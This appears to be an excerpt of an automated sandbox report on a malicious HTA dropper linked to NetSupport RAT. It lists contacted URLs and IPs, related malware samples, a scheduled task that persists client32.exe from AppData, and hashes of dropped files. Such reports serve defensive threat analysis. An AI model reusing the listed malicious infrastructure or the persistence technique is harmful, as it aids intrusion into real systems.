                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.pci.co.uk/supportsupportclient32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://geo.netsupportsoftware.com/location/loca.aspzclient32.exe, 00000015.00000002.518283552.0000000003C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://go.micropowershell.exe, 00000006.00000002.272842190.00000000058D4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/Licensepowershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlPIpowershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpfalse
                                                      • URL Reputation: safe
                                                      low
                                                      http://geo.netsupportsoftware.comclient32.exe, 00000015.00000002.517350632.0000000002D95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://127.0.0.1client32.exe, 00000015.00000002.519267559.0000000011193000.00000002.00000001.01000000.00000013.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.272842190.000000000515D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://pesterbdd.com/images/Pester.pngPIpowershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://github.com/Pester/PesterPIpowershell.exe, 00000002.00000002.264547479.000000000438C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://geo.netsupportsoftware.comlocation/loca.aspclient32.exe, 00000015.00000002.517350632.0000000002D95000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://contoso.com/powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.270662092.00000000052B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.277117495.0000000006086000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.netsupportschool.com/tutor-assistant.asp11(client32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpfalse
                                                                high
                                                                http://geo.netsupportsoftware.com/location/loca.aspsclient32.exe, 00000015.00000002.518283552.0000000003C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.264547479.0000000004251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.272842190.0000000005021000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://geo.netsupportsoftware.com/location/loca.aspgclient32.exe, 00000015.00000003.387088280.00000000060F0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.519059336.00000000060F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000015.00000002.519343062.00000000111E1000.00000004.00000001.01000000.00000013.sdmpfalse
                                                                        high
                                                                        http://geo.netsupportsoftware.com/location/loca.aspTelemetry-Clientclient32.exe, 00000015.00000002.518283552.0000000003C00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://geo.netsupportsoftware.com/location/loca.aspkclient32.exe, 00000015.00000002.518283552.0000000003C1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            162.215.249.83
                                                                            advisingdealers.comUnited States
                                                                            394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                            5.252.178.51
                                                                            unknownMoldova Republic of
                                                                            39798MIVOCLOUDMDfalse
                                                                            62.172.138.8
                                                                            geography.netsupportsoftware.comUnited Kingdom
                                                                            5400BTGBfalse
                                                                            Joe Sandbox Version:38.0.0 Beryl
                                                                            Analysis ID:1305463
                                                                            Start date and time:2023-09-07 18:18:02 +02:00
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 12m 43s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:30
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample file name:Client_version(updater).hta
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winHTA@14/27@7/3
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 33
                                                                            • Number of non-executed functions: 6
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .hta
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, Microsoft.Photos.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, ApplicationFrameHost.exe, wuapihost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 151.101.1.91, 151.101.65.91, 151.101.129.91, 151.101.193.91
                                                                            • Excluded domains from analysis (whitelisted): kv601.prod.do.dsp.mp.microsoft.com, ris.api.iris.microsoft.com, geover.prod.do.dsp.mp.microsoft.com, n.sni.global.fastly.net, fs.microsoft.com, geo.prod.do.dsp.mp.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com
                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • VT rate limit hit for: Client_version(updater).hta
                                                                            TimeTypeDescription
                                                                            09:19:39Task SchedulerRun new task: BackgroundCheck path: C:\Users\user\AppData\Roaming\MediaContent\client32.exe
                                                                            18:19:03API Interceptor2x Sleep call for process: mshta.exe modified
                                                                            18:19:10API Interceptor63x Sleep call for process: powershell.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            162.215.249.832019_04___RECH_31919134389067128___1753015405039017763.jsGet hashmaliciousBrowse
                                                                            • commonsensecarbuying.com/cgi-sys/suspendedpage.cgi
                                                                            2019_04___RECH_31919134389067128___1753015405039017763.jsGet hashmaliciousBrowse
                                                                            • commonsensecarbuying.com/cgi-sys/suspendedpage.cgi
                                                                            http://orex-group.net/wp-snapshots/sec.accounts.resourses.com/Get hashmaliciousBrowse
                                                                            • commonsensecarbuying.com/cgi-sys/suspendedpage.cgi
                                                                            5.252.178.51setup.htaGet hashmaliciousNetSupport RATBrowse
                                                                            • http://5.252.178.51/fakeurl.htm
                                                                            Install_Updater_(win-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                            • http://5.252.178.51/fakeurl.htm
                                                                            Install_Updater_(fast-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                            • http://5.252.178.51/fakeurl.htm
                                                                            lolcaljefosijfoesnofiegoiesgnos.htaGet hashmaliciousNetSupport RATBrowse
                                                                            • http://5.252.178.51/fakeurl.htm
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            geography.netsupportsoftware.comsetup.htaGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            Install_Updater_(win-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            Install_Updater_(fast-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            package_details_____________________14631459.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            lolcaljefosijfoesnofiegoiesgnos.htaGet hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            package_details_____________________972968.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.67
                                                                            package_details_____________________185181.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            a2p2pulsepower.org_wp-content_plugins_index.html.ps1Get hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            553155315531.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            151215121512.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            465046504650.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 51.142.119.24
                                                                            771771771.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.67
                                                                            553155315531.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.67
                                                                            259325932593.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.67
                                                                            151215121512.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            465046504650.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.67
                                                                            437943794379.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.67
                                                                            768176817681.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            586058605860.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            332933293329.jsGet hashmaliciousNetSupport RATBrowse
                                                                            • 62.172.138.8
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            PUBLIC-DOMAIN-REGISTRYUS4vM35a4VET.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.91.199.223
                                                                            ORDER_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 208.91.199.223
                                                                            https://indd.adobe.com/view/2c3a9ea4-1676-4883-936e-77bf7d076eeeGet hashmaliciousHTMLPhisherBrowse
                                                                            • 204.11.59.105
                                                                            shipping_doc.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                            • 208.91.198.143
                                                                            DHL_DOC_74653898.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.91.199.225
                                                                            USD12000.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.222.226.194
                                                                            PROOF_OF_PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.222.226.194
                                                                            SecuriteInfo.com.Trojan.Inject4.60790.11658.12591.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 103.211.216.53
                                                                            debit_note_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 103.53.42.223
                                                                            debit_note_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 103.53.42.223
                                                                            kyvhU0KdbE.exeGet hashmaliciousFormBookBrowse
                                                                            • 162.215.226.7
                                                                            swift_copy.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.91.199.224
                                                                            Scanned_POs_AllComps_EPDA_&_comp_POs,_PSB-17398902,_84789.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 103.53.43.36
                                                                            rPURCHASEORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 103.53.43.36
                                                                            z6CurriculumVitae.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.91.199.223
                                                                            z14CurriculumVitae.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.91.198.143
                                                                            xOFeC4FvkJ.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.91.199.223
                                                                            SecuriteInfo.com.Trojan.PackedNET.2314.13925.14940.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 216.10.246.178
                                                                            setup.htaGet hashmaliciousNetSupport RATBrowse
                                                                            • 162.215.249.83
                                                                            Install_Updater_(win-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                            • 162.215.249.83
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousXmrigBrowse
                                                                            • 162.215.249.83
                                                                            oinHDFSAuy.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            0SsOGWQQTe.exeGet hashmaliciousFormBookBrowse
                                                                            • 162.215.249.83
                                                                            at1bhqSn5F.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            1AzNWheuOz.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            mIg4DM58Bu.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            BFdDLHONGH.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            7MyyzdwkFC.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            0kfXAQf64z.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            New_Order.jsGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            3Tzm9pGIDj.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            2859531946.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            D0mw1vNLhV.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            Quotation.PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            JfppMiCv86.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            XpXJvfwBgE.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            Jb9KLc3Qg6.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            ybWWIxmktc.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 162.215.249.83
                                                                            bb.exeGet hashmaliciousLuca StealerBrowse
                                                                            • 162.215.249.83
                                                                            LUqvXa6btC.exeGet hashmaliciousRedLine, XmrigBrowse
                                                                            • 162.215.249.83
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\Users\user\AppData\Roaming\MediaContent\HTCTL32.DLLsetup.htaGet hashmaliciousNetSupport RATBrowse
                                                                              Install_Updater_(win-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                                Install_Updater_(fast-silent).htaGet hashmaliciousNetSupport RATBrowse
                                                                                  package_details_____________________14631459.jsGet hashmaliciousNetSupport RATBrowse
                                                                                    lolcaljefosijfoesnofiegoiesgnos.htaGet hashmaliciousNetSupport RATBrowse
                                                                                      package_details_____________________972968.jsGet hashmaliciousNetSupport RATBrowse
                                                                                        package_details_____________________185181.jsGet hashmaliciousNetSupport RATBrowse
                                                                                          553155315531.jsGet hashmaliciousNetSupport RATBrowse
                                                                                            151215121512.jsGet hashmaliciousNetSupport RATBrowse
                                                                                              465046504650.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                771771771.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                  553155315531.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                    259325932593.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                      151215121512.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                        465046504650.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                          437943794379.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                            768176817681.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                              586058605860.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                332933293329.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                  352535253525.jsGet hashmaliciousNetSupport RATBrowse
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x427, components 3
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):77730
                                                                                                                    Entropy (8bit):7.965084222605706
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:AZ8LEnVhqh09lOdKpFh1TBdxYcLiWbE3XaiPJ21jW:PclxwQbniPw1jW
                                                                                                                    MD5:9A29BB29F33FC6A943EE6B61F16368A1
                                                                                                                    SHA1:D6461DED789E8EFB952CAB8D19568CF7D1BF05C4
                                                                                                                    SHA-256:5D370DA32FD7E70233090F9B1DF2F93B53D0EF330168CFA91008B2AAC1DF333B
                                                                                                                    SHA-512:620C9617C53328F9A4B2D04098034A776471D36D71A64FCC0DA580A43F495156B4CD504643BCBF9D0021512DF1FE3FFE2A049E7318263F0FC65E3F90AB784C29
                                                                                                                    Malicious:false
                                                                                                                    Preview:......JFIF.............C....................................................................C......................................................................................................................O...........................!1A..."Qaq..2..#BCRb...$%3Sr...4c.Ds..5.....T...'...................................C........................!1.AQ.."aq......23...#B.R.br$...%4C..................?...DJ"Q.f#.......!.:..q'Y?..:.M .P]....U..^.....=.;tim..6..vch.vU.c1H...8=..z..J..%.(.DP@.n+<.....k....MO...l>G.......~..@R...D.*[..\.."9.<.....yo..Hbxx.{C.Zw.l9=w.C.;.B.i...N..#>uv.1..7MGa.Q.....z....Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DJ"Q...D.%.(.DPX........w..nd3>J.5>....x....../A..G....%.uq.4.-jJ...R.@W..l....P.b..M..z.....s@>+9$z..H./)..z.j...r`...]}..s..mL...:.r.Y..B......!...S..XkIzb..f\7a...`.Z..iC4-.}....m$l.k..cb...u....>...[.....l.....O..{...N.............@.Q.q..U.K...|W.......{..{.}O..Kg4a...aV..U.Os....#g.z..y...pXb.M.>K......&:..3...ww...Pc[b..$v
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):51515
                                                                                                                    Entropy (8bit):5.046256999178798
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:G8V3CNBQkj2Yh4iUxkaVJflJnUvoqdm56/zFzgVx1Uzj7vioBnNe7oZnlyUOdB1S:G8V3CNBQkj2YqiUkaVJflJnUvoqdm56d
                                                                                                                    MD5:4C474652557F8E5395A4BC7622105C22
                                                                                                                    SHA1:D76163ED9920128B4B40A6BEEAA7A1550E8DEB02
                                                                                                                    SHA-256:0F70EE5539D2643E26AE3D02562D4EC01873619EDB9ECC696D69A0448DEA2D7D
                                                                                                                    SHA-512:23AA2B32A1DBC83F7DC0E37014CD2AE58506A672F347A5245BF39A2AD8396C947DFB0893B58F62C516022B209B9BA38592650B0FDFC1988E5637FB970B966ED0
                                                                                                                    Malicious:false
                                                                                                                    Preview:PSMODULECACHE.:...A......?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy................q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):24388
                                                                                                                    Entropy (8bit):5.431990745746622
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:C5sLhhkgrGZ/xhJGx5vCEaBpDKV0JNRcUMHuB3RdZlXY11:zha/Jk5ra/q0JncrHSZda1
                                                                                                                    MD5:AFA5FD46B93F6AE48F2041BA4E872ADB
                                                                                                                    SHA1:ABC1351BB4233F73EC21FA15C3A8DE51497C17ED
                                                                                                                    SHA-256:A89A9395FBB29BD5AD63E14A0EC5CE4451EBC98BA992FC2D702460023723B07D
                                                                                                                    SHA-512:29426ED12153CFB073AFA91CC1C7E5300885D4FC9FC10CD84231722C06935A846E1D5371E41786FE1A4711AFE31D8EB0A3A8AB128AF40982F5F57861195C2C5C
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e...........A...............................................D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.4................ .v'#-N....M..d........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8....................@.Z:.h...........System.Numerics.@...............$TRE..&D.#.t.c%A........System.DirectoryServices<.....................N...>m..>........System.Management...4...................v.A.Z...W.1".......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................&M ..E..;............System.Transactions.<.................hr..B.....w.O........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD.....................G..H.).7.........System.Configuration.Ins
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):17676
                                                                                                                    Entropy (8bit):5.23181768865602
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:gRsbMPKPPpq6TnJF37otz/dPTAduumSlh3Ron:RMP2pqqJ57Wd7AduLSlhBG
                                                                                                                    MD5:A6A7B9D90BA31AF30D42686C724F16DB
                                                                                                                    SHA1:A2E1ACFE215D20EECB8A94673DB7BA6A0F437741
                                                                                                                    SHA-256:4FF60232FCBB4E25BFE7C607F4BD67A0BA248B91A979596663870DF9974BF503
                                                                                                                    SHA-512:2F60D089CA172AA6021C0D503E54F16C7F8ADDC014BA36D2AF46F39AE55EB24A5B82D7FAA95CBD7A8D393421274ED85E8F59B15B27C042DB45517E5036EA44EE
                                                                                                                    Malicious:false
                                                                                                                    Preview:@...e.....................I.X.N.E...I.B..............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.4................ .v'#-N....M..d........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8....................@.Z:.h...........System.Numerics.@...............$TRE..&D.#.t.c%A........System.DirectoryServices<.....................N...>m..>........System.Management...4...................v.A.Z...W.1........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................&M ..E..;............System.Transactions.<.................hr..B.....w.O........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D.....................G..H.).7.........System.Configuration.Ins
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                    Malicious:false
                                                                                                                    Preview:1
                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    File Type:very short file (no magic)
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1
                                                                                                                    Entropy (8bit):0.0
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:U:U
                                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
